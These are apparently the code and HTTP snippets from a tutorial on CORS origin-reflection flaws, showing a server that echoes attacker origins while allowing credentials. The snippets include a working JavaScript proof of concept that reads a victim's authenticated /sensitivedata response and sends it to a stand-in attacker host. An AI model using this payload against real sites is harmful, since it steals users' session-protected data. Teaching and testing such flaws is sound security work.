origin reflection
GET /sensitivedata HTTP/1.1
Host: vuln.feifei.tw
Origin: https://malicious.feifei.com.tw
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious.feifei.com.tw
Access-Control-Allow-Credentials: true
...
https://malicious.feifei.com.tw
sessionid
GET /sensitivedata HTTP/1.1
Host: vuln.feifei.tw
Origin: https://malicious1.feifei.com.tw
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious1.feifei.com.tw
Access-Control-Allow-Credentials: true
...
Access-Control-Allow-Origin
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vuln.feifei.tw/sensitivedata',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//malicious.feifei.com.tw/log?key='+this.responseText;
};
Access-Control-Allow-Origin: null
*
Access-Control-Allow-Origin